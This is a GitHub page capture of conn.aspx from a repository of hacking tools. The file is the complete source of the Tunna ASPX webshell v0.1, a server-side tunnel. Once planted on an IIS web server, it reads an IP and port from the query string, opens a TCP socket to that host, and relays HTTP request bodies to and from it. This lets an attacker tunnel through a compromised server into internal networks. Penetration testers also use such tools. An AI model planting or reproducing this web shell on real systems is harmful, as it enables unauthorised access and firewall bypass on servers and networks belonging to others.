forked from arschlochnop/hack_tools_for_me
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathconn.aspx
143 lines (136 loc) · 4.27 KB
/
conn.aspx
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
<%@ Page Language="C#" Debug="true" ENABLESESSIONSTATE = true ValidateRequest="false" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.SessionState" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.Configuration" %>
<%@ Import Namespace="System.Threading" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Text" %>
<script runat="server">
//
//Tunna ASPX webshell v0.1 (c) 2013 by Nikos Vassakis
//http://www.secforce.com / nikos.vassakis <at> secforce.com
//
protected System.Web.UI.HtmlControls.HtmlInputFile File1;
protected Socket connect(){ //Create and connect to socket
Socket socket;
IPHostEntry ipHostInfo;
IPAddress ipAddress;
IPEndPoint remoteEP;
string ip;
int port;
try{ //Initialise values
ip = (string) Session["ip"];
port = (int) Session["port"];
}
catch{
HttpContext.Current.Response.Write("[Server] Missing Arguments");
throw;
}
try{
ipHostInfo = Dns.GetHostByAddress(ip); //Dns.GetHostByName
ipAddress = ipHostInfo.AddressList[0];
if (ipAddress==null){ throw new Exception("Wrong IP"); }
remoteEP = new IPEndPoint(ipAddress, port);
socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket.SetSocketOption(SocketOptionLevel.Socket, SocketOptionName.ReceiveTimeout, 2000); //NOTE:20 second timeout
}
catch{
HttpContext.Current.Response.Write(Session["ip"]);
HttpContext.Current.Response.Write("[Server] Unable to resolve IP");
throw;
}
try{ //Connect to socket
socket.Connect(remoteEP);
}
catch(Exception){
HttpContext.Current.Response.Write("[Server] Unable to connect to socket");
throw;
}
try{ //Socket in non-blocking mode because of the consecutive HTTP requests
socket.Blocking = false;
}
catch(Exception){
HttpContext.Current.Response.Write("[Server] Unable to set socket to non blocking mode");
throw;
}
return socket;
}
protected void Page_Load(object sender, EventArgs e){
HttpContext.Current.Server.ScriptTimeout = 600; //NOTE: randomly chose 600
int port;
string ip;
if (Request.Url.Query.StartsWith("?proxy")){ //XXX:Stupid hack but works
if (Request.Url.Query.StartsWith("?proxy&close")){ //If url var close receive: close socket / invalidate session / Kill thread
Session["running"] = -1;
Socket socket = Session["socket"] as Socket;
if (socket != null){
socket.Close();
}
Session.Abandon();
Response.Cookies.Add(new HttpCookie("ASP.NET_SessionId",""));
Response.Write("[Server] Killing the handler thread");
return;
}
if(Request.QueryString["port"] != null){ //if port is specified connects to that port
Session["port"] = Convert.ToInt32(Request.QueryString["port"]);
}
if(Request.QueryString["ip"] != null){ //if ip is specified connects to that ip
Session["ip"] = Request.QueryString["ip"];
}
else{
Session["ip"] = "127.0.0.1";
}
if(Session["running"] == null){ //1st request: initiate the session
Session["running"] = 0;
Response.Write("[Server] All good to go, ensure the listener is working ;-)");
}
else{
if ((int)Session["running"] == 0){ //2nd request: get configuration options
try{
Session["socket"] = connect();
Session["running"] = 1;
Response.Write("[OK]"); //Send [OK] back
return;
}
catch(Exception){
return;
}
}
else{
Socket socket = Session["socket"] as Socket;
//Read data from request and write to socket
byte[] postData = Request.BinaryRead(Request.TotalBytes);
if (postData.Length > 0){
try{
socket.Send(postData);
}
catch(Exception){
HttpContext.Current.Response.Write("[Server] Local socket closed");
}
}
//Read Data from socket and write to response
byte[] receiveBuffer = new byte[8192];
try{
int bytesRead = socket.Receive(receiveBuffer);
if (bytesRead > 0) {
//Welcome to C trim
byte[] received = new byte[bytesRead];
Array.Copy(receiveBuffer, received , bytesRead);
Response.BinaryWrite(received);
}
else {
HttpContext.Current.Response.Write(""); //No data on socket: send nothing back
}
}
catch(Exception){
HttpContext.Current.Response.Write("");
}
}
}
}
}
</script>